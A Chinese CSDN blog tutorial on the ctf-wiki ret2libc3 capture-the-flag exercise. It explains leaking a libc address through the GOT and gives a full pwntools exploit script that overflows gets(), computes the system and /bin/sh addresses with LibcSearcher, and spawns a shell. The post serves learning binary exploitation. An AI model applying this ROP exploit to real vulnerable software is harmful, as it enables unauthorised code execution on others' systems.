pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3

最新推荐文章于 2024-05-23 18:42:46 发布
最新推荐文章于 2024-05-23 18:42:46 发布
阅读量1.1k 收藏 6
点赞数 3
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52658640/article/details/116065804
版权

文章目录

基础知识

libc泄露

原理

当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。
system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。
由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。

利用方法

这里需要下载一个工具LibcSearcher(下载与使用方法

举个例子,在栈溢出之前执行了一个puts函数,若我们知道其地址的话既可以利用脚本获得:

    libc = LibcSearcher("gets",gets_real_addr)

    libcbase = gets_real_addr – obj.dump("fgets")
    system_addr = libcbase + obj.dump("system")            #system 偏移
    bin_sh_addr = libcbase + obj.dump("str_bin_sh")         #/bin/sh 偏移

ret2libc3

在ctfwiki上是给了三个例子的,难度循序渐进,因为前两个例子所涵盖的知识点第三个例子里面都能体现,所以我在此只分析例题三一个。

挖掘漏洞

在分析文件之前还是要先检查一下文件的保护机制。

    ret2libc3 checksec ret2libc3
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

相较于前两个例子,例3仍然开启了NX保护(堆栈不可执行保护)。

查看main函数源代码如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets((char *)&v4);
  return 0;
}

发现bug仍然是gets函数引起的栈溢出,查看函数和字符串,不存在危险函数system或者execve函数,也没有字符串’/bin/sh’

我们获得 system函数地址的方法就需要上面我们所提到的关于libc泄露的知识。我们只需要利用elf获得到__libc_start_main函数的plt表地址和got表地址就可以利用上述知识获得system的地址。在libc里也会有/bin/sh字符串,所以同理可得/bin/sh的地址。

这里我们泄露__libc_start_main函数是因为它是程序最初被执行的地方。

利用漏洞

通过构造两次payload进行漏洞利用:
第一次构造payload:通过获得elf获得puts函数的plt表值,__libc_start_main 的got表值,还有main函数的地址用来第二次出发漏洞以及puts输出main函数的地址
第二次构造payload:利用__libc_start_main地址得到的libc版本,通过LibcSearcher得到函数的偏移量。可以利用下面的公式

函数源地址=libc基址+函数的偏移地址
libc基址=函数源地址-函数偏移地址

这样就可以得到system的地址和/bin/sh地址。

利用脚本

from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']
payload = 'a'*112+p32(puts_plt)+p32(main)+p32(libc_start_main_got)
sh.sendlineafter('Can you find it !?', payload)

libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

payload = 'a'*104+p32(system_addr)+'aaaa'+p32(binsh_addr)
sh.sendline(payload)

sh.interactive()

参考文章
https://ctf-wiki.org/pwn/linux/stackoverflow/basic-rop/#3

大能猫能
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1066
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
CTF-PWN笔记(一)-- 栈溢出基础ROP
CK_0ff的博客
01-09 4385
文章目录linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压 (push) 与出 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作顶,当然,它也有底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的,用于保存
ret2libc 泄露libc后构造system(‘/bin/sh‘)进行攻击(pwn入门)
最新发布
2402_83422357的博客
05-23 1257
上面提到了一个措施,ASLR,它在开启后会对共享libc,堆,和的地址进行随机化,所谓的随机化呢,就是偏移。接下来以star函数作为返回地址,以star函数作为返回地址可以使我们第二次栈溢出的时候不需要再按照程序逻辑输入2次yes而且star函数是唯一有栈溢出的函数,所以返回地址的正确选取很重要,之前有一次做题返回地址没选好,给自己增加了很多不必要的麻烦.......这个是最基础的32位的ret2libc,还有64位程序的也差不多,就是传参的方式变了,攻击的payload构造的思路是一样的。
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2689
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 5678
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
CTF(Pwn) Rop + ret2libc 题型 常规解法思路 (初级)
半岛铁盒的博客
03-22 1074
引子 随着 NX 保护的开启,以往直接向或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。 之所以称之为 ROP,是因为核心在于利用了指令
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
libc-database:建立libc偏移量数据库以简化开发
04-01
libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2282
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
ret2libc
huzai9527的博客
02-03 445
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
ret2libc3地址泄露
weixin_44271563的博客
03-24 1522
ret2libc3地址泄露 好难 好难₍₍ (̨̡ ‾᷄ᗣ‾᷅ )̧̢ ₎₎ 先进行代码分析 通过IDA反编译一下,分析代码; 发现本次实验不能直接运用我们之前system函数和bin/sh,所以我们要通过got表和plt表来找到system和bin/sh的准确位置,然后连接代码;最后进行getshell。 先看看别人的思路 先上个cdsn https://ctf-wiki.github.io...
实验三——ret2libc3地址泄露
wwh的博客
04-22 1951
用【checksec】查看:不存在必要的保护 查看got表信息:【readelf -r ret2libc3】 所以我决定用泄露 __libc_strart_main 的地址,来判定libc的版本 这里插入代码 from pwn import * from LibcSearcher import * context.log_level='debug' context.terminal=['gn...
pwn ——ret2libc3
qq_41696518的博客
07-06 812
ret2libc3
Wiki-ret2libc3
TedLau的博客
03-20 531
0x 00 前言 因为libc3里面没有自带的system函数,我的水平又比较低,之前的kali里面没有更新libc-database,导致以为是自己的kali系统的问题,所以一直就没有学这方面的内容,这次更新了ubuntu中的libc-database,从而使得这方面的题目可以正常运行了,所以就来学习了,我觉得正常的比赛中也是不常有带有system函数的,故打算写出来以加深印象。这周再学习...
pwn-ret2libc基础
admin的博客
10-04 841
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值